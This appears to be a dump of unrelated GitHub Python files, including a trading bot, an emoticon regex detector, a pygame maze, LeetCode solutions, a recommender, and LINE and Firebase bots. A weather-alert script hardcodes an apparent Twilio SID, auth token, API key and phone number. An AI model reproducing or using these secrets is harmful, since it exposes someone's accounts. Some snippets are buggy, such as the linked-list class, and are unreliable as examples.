self\n\n def __await__(self):\n return self.async_init().__await__()\n\n async def entry(self,order):\n tradeDetails = {}\n mainOrderDetails = await self.algoBroker.create_order(order)\n # if mainOrderDetails is not None:\n # print(mainOrderDetails)\n\n # slOrderDetails = await self.algoBroker.create_order(order)\n # if slOrderDetails is not None:\n # print(slOrderDetails)\n #\n # tgOrderDetails = await self.algoBroker.create_order(order)\n # if tgOrderDetails is not None:\n # print(tgOrderDetails)\n\n return mainOrderDetails\n\n async def exit(self,order):\n exitDetails = self.algoBroker.create_order(order)\n return exitDetails\n\n\nclass AlgoUser():\n def __init__(self, broker, userid):\n self.broker = broker\n self.userid = userid\n\n async def execute_signals(self,signallist):\n algoSpread = await AlgoSpread(self.broker,self.userid)\n\n for signal in signallist:\n await log_with_bot('i', f'signal : {signal}')\n\n resp = await algoSpread.create_naked_spread(signal)\n print(resp)\n\n\n\n # spread = await algoSpread.create_credit_spread(signal)\n #\n # # activeSpreads = await self.algoSpread.get_spreads_data(signal)\n # # for spread in activeSpreads:\n # # print(spread)\n\n\n\n","repo_name":"lohithkg/AlgoAPI_User","sub_path":"services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":22954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"33240245698","text":"#-*-coding:utf-8-*-\nimport re\n\nmetachr = '^$*+?{}[]\\|()'\n\nheads = u'''>ζↁ━இㅇ(┌/∑┐ψ〒ʕ└⊙<√=☜ㄟ〠Σ•ತ✧╰(*-/☮Oε┴‷〈ಸ爻<︿乁♡bˋ⁄ˇఠ◉ಠ○vm#◎⇎Ψmb◔♀ⶸლ\\。 ̄◢づ‧≧흫…╭o╮ჰ≡癶凸~ヽヾ'''\ntails = u'''ↁノ「↑̖〠ิ▽♀⁄ˇ◣~⑤╮凵︿・|━)dʔಠ√ತ'+/°3ืಸ;?ξツఠm﹏◎\"⇎。≡╩╭oჴஇ☆┌з┐〒↗⊙☮☞•…*.┴:\︴♡σ♂d○●Z ̄b≦♪╬╰癶>シ~#〉3↘┛”;!✧)Ψ-ⶸ=_ㅇψˊノ◔ლaづ╧흫m╯y凸'''\nfor i in metachr:\n heads = heads.replace(i, '\\\\'+i)\n tails = tails.replace(i, '\\\\'+i)\n\n\ndef ensure_unicode(string):\n if not isinstance(string, unicode):\n try:\n string = string.decode('utf-8')\n except:\n raise UnicodeError('Input should be UTF8 or UNICODE')\n return string\n\ndef clear_num(txt):\n num_pat = re.compile(u'''([0-9\\-.:/]{2,})''')\n res = num_pat.sub('', txt)\n return res\n\ndef post_check(candlst):\n con = []\n for i in candlst:\n while True:\n i_mod = i.strip()\n i_mod = re.sub(u'\\([一-龥]{1,}[\\)]{0,1}', '', i_mod)\n i_mod = re.sub(u'([一-龥]{1,})', '', i_mod)\n if len(set(i_mod)) < 3:\n break\n else:\n if re.search(u'^m:[0-9a-zA-Z一-龥]', i_mod): # m:大大\n break\n elif re.search(u'^~[0-9a-zA-Z一-龥]', i_mod): #~4次\n break\n elif i_mod == i:\n con.append(i_mod)\n break\n else:\n i = i_mod \n continue\n return con\n\ndef exclude_cht(txt):\n pat = re.compile(u'''(?!.*[.a-zA-Z][.a-zA-Z])([一-龥][一-龥]{2,})''')\n while True:\n res = pat.sub('', txt)\n if res == txt:\n return res\n else:\n txt = res\n exclude_cht(txt)\n\ndef find_emo(txt, source=False):\n txt = ensure_unicode(txt)\n txt_mod = clear_num(txt)\n txt_mod = exclude_cht(txt_mod)\n emo_pat = re.compile(u'''(?!.*[.a-zA-Z][.a-zA-Z])([%s].{3,})''' % heads)\n res = emo_pat.findall(txt_mod)\n res = post_check(res)\n res = [i for i in res if i in txt]\n if source == True:\n for x in res:\n txt = txt.replace(x, ''+x+'') \n return (res,txt)\n return res\n\n","repo_name":"amigcamel/Jseg","sub_path":"jseg/Emodet/emodet2.py","file_name":"emodet2.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"68"} +{"seq_id":"37517240716","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*\nimport pygame\nfrom pygame.locals import *\nfrom classes import *\nfrom constantes import *\n#boucle jeu, ecran, accueil, init()\n\npygame.init()\nfenetre=pygame.display.set_mode((450,450),FULLSCREEN)\nfond = pygame.image.load(image_accueil).convert()\nfenetre.blit(fond,(0,0))\npygame.display.flip()\ncontinuer=1\nmenu=1\njouer=1\nniveau=0\nchoix=0\narrivee=[]\nwhile continuer:\n while menu:\n pygame.time.Clock().tick(30)\n for event in pygame.event.get():\n if event.type==QUIT or (event.type==KEYDOWN and event.key==K_ESCAPE):\n menu=0\n continuer=0\n jouer=0\n elif event.type == KEYDOWN:\n if event.key == K_F1:\n \n choix = \"n1\"\n elif event.key == K_F2:\n \n choix = \"n2\"\n \n if choix!=0: \n niveau = Niveau(choix)\n niveau.generer()\n fenetre=niveau.affichage()\n menu=0\n depart=niveau.depart()\n arrivee=niveau.arrivee()\n dk=Joueur(depart[0],depart[1])\n fenetre.blit(dk.dk,(dk.pos_x*30,dk.pos_y*30))\n\n while jouer:\n pygame.display.flip()\n pygame.time.Clock().tick(30)\n if arrivee[0]==dk.pos_x and arrivee[1]==dk.pos_y:\n continuer=0\n print(\"Vous avez gagné\")\n jouer=0\n for event in pygame.event.get():\n if event.type==QUIT:\n jouer=0\n continuer=0\n if event.type==KEYDOWN:\n if event.key==K_UP and dk.pos_y>0 and niveau.structure[dk.pos_x][dk.pos_y-1]!=\"m\":\n dk.up()\n elif event.key==K_DOWN and dk.pos_y<14 and niveau.structure[dk.pos_x][dk.pos_y+1]!=\"m\":\n dk.down()\n elif event.key==K_LEFT and dk.pos_x>0 and niveau.structure[dk.pos_x-1][dk.pos_y]!=\"m\":\n dk.left()\n elif event.key==K_RIGHT and dk.pos_x<14 and niveau.structure[dk.pos_x+1][dk.pos_y]!=\"m\":\n dk.right()\n fenetre=niveau.affichage()\n fenetre.blit(dk.dk,(dk.pos_x*30,dk.pos_y*30))\n \n","repo_name":"tsalmon/labyrinthe","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38029613085","text":"# https://leetcode.com/problems/count-items-matching-a-rule/\n\nclass Solution:\n def countMatches(self, items: List[List[str]], ruleKey: str, ruleValue: str) -> int:\n \n rule_index = {\n \"type\" : 0,\n \"color\" : 1,\n \"name\" : 2\n }\n \n condition = rule_index[ruleKey]\n \n count = 0\n for rows in items:\n if rows[condition] == ruleValue:\n count += 1\n\n return count\n","repo_name":"HunkWhoCodes/LeetCodeSolutions","sub_path":"PythonSolutions/1773-CountItemsMatchingARulesolution/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"3619902429","text":"def insertionSort(array):\n\n for step in range(1, len(array)):\n key = array[step]\n j = step - 1\n \n while j >= 0 and key < array[j]:\n array[j + 1] = array[j]\n j = j - 1\n \n array[j + 1] = key\n\n\ndata = [int(input(\"Enter a number: \")) for i in range(int(input(\"Enter the size of the array: \")))]\n\nprint(\"Unsorted array: \", data)\ninsertionSort(data)\nprint('Sorted Array in Ascending Order:')\nprint(data)","repo_name":"subhashishnabajja/college-code","sub_path":"fy/sem-2/Algorithm/practical-5/insertion-sort.py","file_name":"insertion-sort.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"1008151840","text":"# import python modules\nimport glob\nfrom threading import Timer\nfrom time import sleep, time\nfrom random import randrange\nimport sys\n\n# import PyQt5 modules (universal with PySide2)\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtCore import pyqtSlot as Slot\nfrom PyQt5.QtWidgets import QApplication, QWidget, QLabel, QPushButton\n\n# import project modules\nfrom score import ScoreDev\n# from ../audioEngine import Audio_engine\n\n\nclass MainApplication(QWidget):\n\n def __init__(self):\n QWidget.__init__(self)\n # is unity running the notation png's?\n self.unity_score = True\n\n # set vars and params\n self.running = True\n\n self.score_dict = {\"top_left\": {\"time\": time(), \"image\": None},\n \"top_right\": {\"time\": time(), \"image\": None},\n \"bottom_left\": {\"time\": time(), \"image\": None},\n \"bottom_right\": {\"time\": time(), \"image\": None}}\n\n self.score_dict_list = [\"top_left\",\n \"top_right\",\n \"bottom_left\",\n \"bottom_right\"]\n\n # generate the ML score images\n # todo - find better solution for changing global font colour\n # todo - current solution was to change color in brown/core/stem.py\n # and brown/constants.py\n score = ScoreDev()\n\n # start the audio listener thread\n # self.audiobot = Audio_engine()\n\n # UI setup and off we go\n self.title = 'Nautilus'\n self.left = 10\n self.top = 10\n self.width = 320\n self.height = 200\n self.initUI()\n\n def initUI(self):\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n\n # create all labels\n if self.unity_score:\n # create a start button\n self.start_button = QPushButton(\"START\", self)\n self.start_button.setCheckable(True)\n self.start_button.toggle()\n self.start_button.move(100, 70)\n\n # adding action to the button\n self.start_button.clicked.connect(self.start_score)\n\n # and off we go\n self.show()\n\n else:\n # owns the images that were produced by the scorebot\n self.image_files = glob.glob('data/images/*.png')\n\n # create labels\n self.createLabels()\n\n # and off we go\n self.gui_thread = None\n self.update_gui()\n\n @Slot()\n def start_score(self):\n if not self.start_button.isChecked():\n print(\"Starting\")\n self.start_button.setText(\"STOP\")\n self.audiobot.go_bang = True\n else:\n print(\"Stopping\")\n self.audiobot.go_bang = False\n self.audiobot.running = False\n self.start_button.setText(\"START\")\n # todo - close down all other funcs & threads\n sleep(1)\n print(\"bye bye\")\n self.running = False\n\n # update the GUI and check the quad images\n def update_gui(self):\n # print(\"-------- updating gui\")\n while self.running:\n self.update()\n self.updateImage()\n self.gui_thread = Timer(0.1, self.update_gui)\n self.gui_thread.start()\n\n def createLabels(self):\n screen_resolution = self.geometry()\n height = screen_resolution.height()\n width = screen_resolution.width()\n\n # widget params\n self.setGeometry(100, 100, 900, 700)\n\n # creating a label widget\n self.top_left_label = QLabel(self)\n\n # moving position\n self.top_left_label.move(0, 0)\n\n # setting up border\n self.top_left_label.setStyleSheet(\"border: 1px solid black;\")\n\n # resizing the widget\n self.top_left_label.resize(width / 2, height / 2)\n\n # creating a label widget\n self.top_right_label = QLabel(self)\n\n # moving position\n self.top_right_label.move(width / 2, 0)\n\n # setting up border\n self.top_right_label.setStyleSheet(\"border: 1px solid black;\")\n\n # resizing the widget\n self.top_right_label.resize(width / 2, height / 2)\n\n # creating a label widget\n self.bottom_left_label = QLabel(self)\n\n # moving position\n self.bottom_left_label.move(0, height / 2)\n\n # setting up border\n self.bottom_left_label.setStyleSheet(\"border: 1px solid black;\")\n\n # resizing the widget\n self.bottom_left_label.resize(width / 2, height / 2)\n\n # creating a label widget\n self.bottom_right_label = QLabel(self)\n\n # moving position\n self.bottom_right_label.move(width / 2, height / 2)\n\n # setting up border\n self.bottom_right_label.setStyleSheet(\"border: 1px solid black;\")\n\n # resizing the widget\n self.bottom_right_label.resize(width / 2, height / 2)\n\n def updateImage(self):\n # check the status of each quad\n for quad in self.score_dict_list:\n t = self.score_dict[quad][\"time\"]\n\n # for key, value in self.score_dict.items():\n # if times up then change image in quadrant\n if t < time():\n file = self.image_files[randrange(len(self.image_files))]\n image_duration = t + (float(file[-7:-4]) * (randrange(2, 20)))\n # self.score_dict[key] = image_duration\n self.score_dict[quad][\"time\"] = image_duration\n # print(\"here\", quad)\n\n # set the new image to a pixmap and put into quad\n self.pixmap = QPixmap(file)\n if quad == \"top_left\":\n self.top_left_label.setPixmap(self.pixmap)\n elif quad == \"top_right\":\n self.top_right_label.setPixmap(self.pixmap)\n elif quad == \"bottom_left\":\n self.bottom_left_label.setPixmap(self.pixmap)\n else:\n self.bottom_right_label.setPixmap(self.pixmap)\n\n\"\"\"this is here for access from elsewhere\nand is written into the note-tokeniser file\"\"\"\nclass NoteTokenizer:\n def __init__(self):\n self.notes_to_index = {}\n self.index_to_notes = {}\n self.num_of_word = 0\n self.unique_word = 0\n self.notes_freq = {}\n\n def transform(self, list_array):\n \"\"\" Transform a list of note in string into index.\n\n Parameters\n ==========\n list_array : list\n list of note in string format\n\n Returns\n =======\n The transformed list in numpy array.\n\n \"\"\"\n transformed_list = []\n for instance in list_array:\n transformed_list.append([self.notes_to_index[note] for note in instance])\n return np.array(transformed_list, dtype=np.int32)\n\n def partial_fit(self, notes):\n \"\"\" Partial fit on the dictionary of the tokenizer\n\n Parameters\n ==========\n notes : list of notes\n\n \"\"\"\n for note in notes:\n note_str = ','.join(str(a) for a in note)\n if note_str in self.notes_freq:\n self.notes_freq[note_str] += 1\n self.num_of_word += 1\n else:\n self.notes_freq[note_str] = 1\n self.unique_word += 1\n self.num_of_word += 1\n self.notes_to_index[note_str], self.index_to_notes[self.unique_word] = self.unique_word, note_str\n\n def add_new_note(self, note):\n \"\"\" Add a new note into the dictionary\n\n Parameters\n ==========\n note : str\n a new note who is not in dictionary.\n\n \"\"\"\n assert note not in self.notes_to_index\n self.unique_word += 1\n self.notes_to_index[note], self.index_to_notes[self.unique_word] = self.unique_word, note\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n image_viewer = MainApplication()\n # image_viewer.showFullScreen()\n # image_viewer.show()\n sys.exit(app.exec_())\n","repo_name":"DigiScore/nautilus","sub_path":"makeScore/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"21577990040","text":"\"\"\"\nカメのアルルは今日 N 個の授業を受けようとしています。\n現在は時刻 0 で、授業 i は時刻Liに始まり、時刻Riに終わります。 授業間の移動時間は 0 であるとして良いですが、授業に遅れて入室することや、早めに退出することはできません。\nアルルは N 個の授業すべてを受けられるでしょうか。\n\"\"\"\n\nN = int(input())\n\ntime_table = []\nfor i in range(N):\n L, R = map(int, input().split())\n time_table.append((L, R))\n\ntime_table.sort(key=lambda x:x[0])\n\nflg = True\n\nfor i in range(1, N):\n if time_table[i-1][1] >= time_table[i][1]:\n flg = False\n break\n\nif flg == True:\n print(\"Yes\")\nelse:\n print(\"No\")\n \n","repo_name":"yuji-sgs/algo-style","sub_path":"ソートアルゴリズム/ソートを活用する問題/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"12212171374","text":"from app import myDb\nfrom collections import defaultdict\nfrom surprise import Reader\nfrom surprise import SVD\nfrom surprise import Dataset\nfrom surprise import NormalPredictor\nfrom surprise.model_selection import cross_validate\nimport pandas as pd\n\ndb = myDb['users']\n\nclass Recommand():\n def __init__(self):\n pass\n\n def get_top_n(predictions, n):\n top_n = defaultdict(list)\n for uid, iid, true_r, est, _ in predictions:\n top_n[uid].append((iid, est))\n for uid, user_ratings in top_n.items():\n user_ratings.sort(key=lambda x: x[1], reverse=True)\n top_n[uid] = user_ratings[:n]\n\n return top_n\n\n def gen_matrix(self):\n itemList = []\n userList = []\n ratingList = []\n result = db.find({})\n for i in result:\n if 'rate_map' in i:\n keysList = i['rate_map'].keys()\n for k in keysList:\n itemList.append(k)\n userList.append(i['username'])\n ratingList.append(i['rate_map'][k])\n ratings_dict = {'itemID': itemList,\n 'userID': userList,\n 'rating': ratingList}\n df = pd.DataFrame(ratings_dict)\n\n reader = Reader(rating_scale=(1, 10))\n\n data = Dataset.load_from_df(df[['userID', 'itemID', 'rating']], reader)\n data.split(n_folds=5)\n cross_validate(NormalPredictor(), data, cv=5 ,measures=['RMSE', 'MAE'],verbose=True)\n trainset = data.build_full_trainset()\n algo = SVD()\n algo.fit(trainset)\n print(trainset)\n testset = trainset.build_anti_testset()\n predictions = algo.test(testset)\n print(predictions)\n for i in predictions:\n print(i)\n return predictions\n","repo_name":"kingry1/book-pybackend","sub_path":"app/recommend/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"21369082014","text":"import gzip\nimport shutil\n\n\nclass Tools:\n\n @staticmethod\n def gzip_file(output_path):\n gz_file_name = '%s.gz' % output_path\n try:\n with open(output_path, 'rb') as f_in, gzip.open(gz_file_name, 'wb') as f_out:\n shutil.copyfileobj(f_in, f_out)\n return gz_file_name\n except Exception as e:\n raise Exception(\"Error when compress to gz file: \" + str(e))","repo_name":"Pangpang2/Python","sub_path":"worker/Reversion/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"10011622313","text":"# Approach 1: Two Pointers\nclass Solution1:\n def threeSumClosest(self, nums: list[int], target: int) -> int:\n diff = float(\"inf\")\n nums.sort()\n for i in range(len(nums)):\n lo, hi = i + 1, len(nums) - 1\n while lo < hi:\n sum = nums[i] + nums[lo] + nums[hi]\n if abs(target - sum) < abs(diff):\n diff = target - sum\n if sum < target:\n lo += 1\n else:\n hi -= 1\n if diff == 0:\n break\n return target - diff\n\n\n# Approach 2: Binary Search\nclass Solution2:\n def threeSumClosest(self, nums: list[int], target: int) -> int:\n pass\n # diff = float('inf')\n # nums.sort()\n # for i in range(len(nums)):\n # for j in range(i + 1, len(nums)):\n # complement = target - nums[i] - nums[j]\n # hi = bisect_right(nums, complement, j + 1)\n # lo = hi - 1\n # if hi < len(nums) and abs(complement - nums[hi]) < abs(diff):\n # diff = complement - nums[hi]\n # if lo > j and abs(complement - nums[lo]) < abs(diff):\n # diff = complement - nums[lo]\n # if diff == 0:\n # break\n # return target - diff\n\n\n# works for any k, not only for 3\nclass Solution:\n def threeSumClosest(self, nums: list[int], target: int) -> int:\n nums.sort()\n return\n\n def KSumClosest(self, nums: list[int], k: int, target: int):\n N = len(nums)\n if N == k:\n return sum(nums[:k])\n\n # target too small\n current = sum(nums[:k])\n if current >= target:\n return current\n\n # target too big\n current = sum(nums[-k:])\n if current <= target:\n return current\n\n if k == 1:\n return min([(x, abs(target - x)) for x in nums], key=lambda x: x[1])[0]\n\n closest = sum(nums[:k])\n for i, x in enumerate(nums[:-k+1]):\n if i > 0 and x == nums[i-1]:\n continue\n current = self.KSumClosest(nums[i+1:], k-1, target - x) + x\n if abs(target - current) < abs(target - closest):\n if current == target:\n return target\n else:\n closest = current\n\n return closest\n","repo_name":"open222333/Other-LeetCode","sub_path":"Python/0016-3SumClosest.py","file_name":"0016-3SumClosest.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70453984538","text":"import requests\r\nfrom twilio.rest import Client \r\naccount_sid = \"AC1007642f283b0b51322868141f2ef45d\"\r\nauth_token = \"8639a38efcfd8a1f39829aca36b65826\"\r\n\r\nmy_lat = 23.138639\r\nmy_lon = 72.536471\r\napi_key = \"74bcdf7e1bd33be6575e1060b8bcd0a5\"\r\nurl = \"https://api.openweathermap.org/data/2.5/weather\"\r\nrain_params = {\r\n \"lat\":my_lat,\r\n \"lon\":my_lon,\r\n \"appid\":api_key,\r\n}\r\nresponses = requests.get(url,params=rain_params)\r\ndata = responses.json()['weather'][0]['main']\r\nprint(data)\r\nclient1 = Client(account_sid,auth_token)\r\nmessage = client1.messages.create(\r\n to = '+919426380974',\r\n from_ = '+13862516407',\r\n body=f'''PYTHON SEND MESSAGE\r\n CURRENT WEATHER = \"{data}\"'''\r\n)\r\nprint(message.sid)","repo_name":"ShubhamHaraniya/Python-Basic-Project","sub_path":"14. Weather_Alert/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"18093358781","text":"from .initialize_firebase import db\nfrom .community_data import ListUsers\nfrom google.cloud import firestore\n\n\ndef CreateCommunity(document_id, user_uid, description=\"the lemonest of societies\",\n categories=['lemon', ]): # (name of community, admin user_id)\n document_ref = db.collection('community').document(document_id)\n data = {\"Description\": description, \"Name\": document_id, \"categories\": categories}\n\n member_subcollection = document_ref.collection('members')\n member_data = {'admin': [user_uid, ], 'muted': []}\n subdocument_ref = member_subcollection.document('members')\n subdocument_ref.set(member_data)\n\n document_ref.set(data)\n if document_ref.id:\n print('Document created successfully.')\n else:\n print('Failed to create document.')\n\n\ndef EditCommunity(document_id, uid, option=None, arg=None):\n print('---list roles---')\n userlist = ListUsers(document_id)\n if uid in userlist['admin']:\n print(f'{uid} is authorized')\n else:\n if option == 'MESSAGE': # send message (arg) to channel\n document_path = f'community/{document_id}/channels/channel-1/chat/messages'\n\n # Update append message to messages\n db.document(document_path).update({\n # ` is required around message-list, why? ...idk ask google\n '`message-list`': firestore.ArrayUnion([{'message': arg, 'uid': uid}])\n })\n else:\n print('unauthorized')\n exit()\n if option == 'ADD': # add channel\n document_ref = db.collection('community').document('channels')\n\n # Create a new document within the channels subcollection\n channel_doc_ref = document_ref.document(arg)\n channel_doc_ref.set({})\n\n # Create the chat subcollection within the channel\n chat_subcollection_ref = channel_doc_ref.collection('chat')\n chat_subcollection_ref.set({})\n\n # Create the messages document within the chat subcollection\n chat_document_ref = chat_subcollection_ref.document('messages')\n chat_data = {'message-list': []}\n chat_document_ref.set(chat_data)\n\n\n elif option == 'DELETE': # delete channel\n # Specify the document path\n document_path = f'community/{document_id}/channels/{arg}'\n\n # Delete the channel\n db.document(document_path).delete()\n elif option == 'MESSAGE':\n pass\n else:\n print('invalid option')\n\n# CreateCommunity(\"Lemon society\", '123')\ndef test():\n EditCommunity('Lemon society', '123', 'add', 'Ice')\n","repo_name":"TheHuntsman4/Hack_Overflow","sub_path":"backend/api/firebase_functions/create_community.py","file_name":"create_community.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"6027799568","text":"\"\"\"\nImplementation of a python program to create a binary tree\nwhen the inOrder and PreOrder traversals of the tree are given.\n\"\"\"\n\n# Class to create a tree node\nclass Node:\n\n def __init__(self, data):\n\n # Contains data and link for both child nodes\n self.data = data\n\n self.left = None\n\n self.right = None\n\n# Function to print the preorder traversal of a tree, once created\ndef printPreOrder(root):\n\n # If the tree exists\n if root:\n\n # Print the data\n print(root.data, end = \" \")\n\n # Traverse left subtree\n printPreOrder(root.left)\n\n # Traverse right subtree\n printPreOrder(root.right)\n\n\"\"\"\nCreation of the Tree from inOrder and level order traversals\n\"\"\"\ndef buildTree(inOrder, levOrder):\n\n # If inorder is there (traversal remains in subtree)\n if inOrder:\n\n # Traversing through the level order\n for i in range(len(levOrder)):\n\n # If we find required node to add just create a node\n # and store its value then break the further iteration\n if levOrder[i] in inOrder:\n\n node = Node(levOrder[i])\n\n inIndex = inOrder.index(levOrder[i])\n\n break\n\n # Do the same for left and right childs of the node\n node.left = buildTree(inOrder[:inIndex], levOrder)\n\n node.right = buildTree(inOrder[inIndex+1:len(inOrder)], levOrder)\n\n # Return the node to it's predecessor\n return node\n\n# The main function\ndef main():\n\n # Input the inorder traversal of the tree\n inOrder = list(map(int, input().split()))\n\n # Input the level order traversal of the tree\n levOrder = list(map(int, input().split()))\n\n # Call the function to build the tree\n root = buildTree(inOrder, levOrder)\n\n # Returning the root of the created Binary Tree\n return root\n\n# The driver code\nif __name__ == '__main__':\n\n # Calling the main function to create and return the tree\n root = main()\n\n # print the preorder traversal of the created tree\n printPreOrder(root)\n","repo_name":"gourav287/Codes","sub_path":"BinaryTree/TreeCreation/CreateCompleteBinaryTreeByInorderAndLevelOrder.py","file_name":"CreateCompleteBinaryTreeByInorderAndLevelOrder.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"70010937816","text":"########################################################\n#### 2D Lists & Nested Loops ####\n########################################################\n\n\nnumber_grid = [\n \n [1, 2, 3], # each one of these is lists within a list. aka rows and columns in a grid like structure \n [4, 5, 6],\n [7, 8, 9],\n [0] \n \n ]\n\n# print(number_grid[index for row][index for the column])\n\nprint(number_grid[2][1]) ; # this would print 8 - why?\n\n# well remember, indexes start at 0 in Python.\n# so, first row (1,2,3) is index 0, likewise first column (1,4,7,0) is index 0 .\n# so, the number 8, in the grid, belongs to 3rd row (indexed as 2) and 2nd column (indexed as 1) \n\n##########################################################################################################\n\n# Nested for loops are basically for loops inside a for loop \n\nfor row in number_grid :\n for col in row:\n \n print(col) ; # prints all numbers out to the console, across the number grid \n \n ","repo_name":"collid1502/Udemy-Learn-Python-Masterclass","sub_path":"2. Program Flow Control in Python/2D Lists & Nested loops.py","file_name":"2D Lists & Nested loops.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"25599373264","text":"# https://github.com/line/line-bot-sdk-python\nfrom google.cloud import datastore\nfrom flask import Flask, request, abort, redirect\nfrom linebot import LineBotApi, WebhookHandler\nfrom linebot.exceptions import InvalidSignatureError, LineBotApiError\nfrom linebot.models import MessageEvent, TextMessage, TextSendMessage, StickerMessage\nimport os\nimport re\nimport config\n\napp = Flask(__name__)\n\nurl_github = \"https://github.com/dr666m1/project_shiki_cast_bot\"\nline_bot_api = LineBotApi(config.token)\nhandler = WebhookHandler(config.secret)\nclient = datastore.Client()\n\n@app.route(\"/\")\ndef github():\n return redirect(url_github)\n\n@app.route(\"/callback\", methods=['POST'])\ndef callback():\n # get X-Line-Signature header value\n signature = request.headers['X-Line-Signature']\n # get request body as text\n body = request.get_data(as_text=True)\n app.logger.info(\"Request body: \" + body) # output log to stdout\n # handle webhook body\n try:\n handler.handle(body, signature)\n except InvalidSignatureError:\n print(\"Invalid signature. Please check your channel access token/channel secret.\")\n abort(400)\n return 'OK'\n\ndef send_message(event, msg=None):\n if msg is None:\n msg = '何かお困りですか?\\n使い方は説明書をご確認ください。\\n\\n{}\\n\\n※環境によってはView all of README.mdを押さないと全文表示されません。'.format(url_github)\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text=msg)\n )\n\nupsert_message = [\n \"【{}】さん推しなんですね!\\n出演が決まったら連絡します。\",\n \"【{}】さん推しやめるんですね?\\n気が変わったら教えてください。\",\n]\n\ndef upsert_fan(event, key_user, cast):\n entity_user = client.get(key_user)\n if entity_user is None:\n entity_user = datastore.Entity(key=key_user)\n favorites = [cast]\n message = 0\n else:\n favorites_prev = entity_user[\"favorites\"]\n if cast in favorites_prev:\n favorites = [x for x in favorites_prev if x != cast]\n message = 1\n else:\n favorites = favorites_prev + [cast]\n message = 0\n entity_user.update({\n \"favorites\": favorites\n })\n client.put(entity_user)\n send_message(event, upsert_message[message].format(cast))\n\n@handler.add(MessageEvent, message=TextMessage)\ndef handle_text_message(event):\n text = re.sub(\"[  ]\", \"\", event.message.text) # delete space\n user_id = event.source.user_id\n if 2 <= len(event.message.text.split(\"\\n\")):\n send_message(event)\n else:\n key_cast = client.key(\"Cast\", text)\n entity_cast = client.get(key_cast)\n if entity_cast is None:\n send_message(event, \"【{}】さんは知らないです...\\nごめんなさい!\".format(text))\n else:\n key_user = client.key(\"Fan\", user_id)\n upsert_fan(event, key_user, key_cast.name)\n\n@handler.add(MessageEvent, message=StickerMessage)\ndef handle_sticker_message(event):\n key_user = client.key(\"Fan\", event.source.user_id)\n entity_user = client.get(key_user)\n try:\n favorites = entity_user[\"favorites\"]\n except TypeError as e:\n favorites = []\n if favorites == []:\n send_message(event, \"よかったら好きなキャストさんを教えてください。\")\n else:\n reply = \"\\n\".join([f + \"さん\" for f in favorites]) + \"\\n推しなんですね!\"\n send_message(event, reply)\n\nif __name__ == \"__main__\":\n app.run(debug=True,host='0.0.0.0',port=int(os.environ.get('PORT', 8080)))\n","repo_name":"kitta65/project_shiki_cast_bot","sub_path":"cloud_run/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"106845892","text":"import csv\n\n# write the results from i_dt to a csv file\ndef writeResult(subject_id, results):\n file_name = f'{subject_id}_results.csv'\n with open(file_name, mode=\"w\", newline='') as subject_data:\n csv_writer = csv.writer(subject_data, delimiter=',')\n csv_writer.writerow(['known','centroid_x', 'centroid_y', 'fix_dur'])\n for result in results:\n row_i = 0\n for row in result[1]:\n csv_writer.writerow([result[0], row[0], row[1], result[2][row_i]])\n row_i += 1\n csv_writer.writerow([])","repo_name":"aatuv/eye2020group4","sub_path":"write_results.py","file_name":"write_results.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"32280736146","text":"class Node():\n\tdef __init__(self,data,nxt,prev):\n\t\tself.data = data\n\t\tself.nxt = None\n\t\tself.prev = None\n\n\t@staticmethod\n\tdef insert_lst(data,head):\n\t\tnode = Node(data)\n\t\ttemp = head\n\t\twhile(temp.nxt!=None):\n\t\t\ttemp=temp.nxt\n\t\ttemp.nxt = node\n\t\tnode.prev = temp\n\t\ttemp.nxt = null\n\n\n\n\n","repo_name":"isharajan/python_stuff","sub_path":"dblyll.py","file_name":"dblyll.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"4511820419","text":"#!/bin/python3\n\nimport sys\n\ndef lonely_integer(a):\n tmp_a= dict()\n for i in a:\n 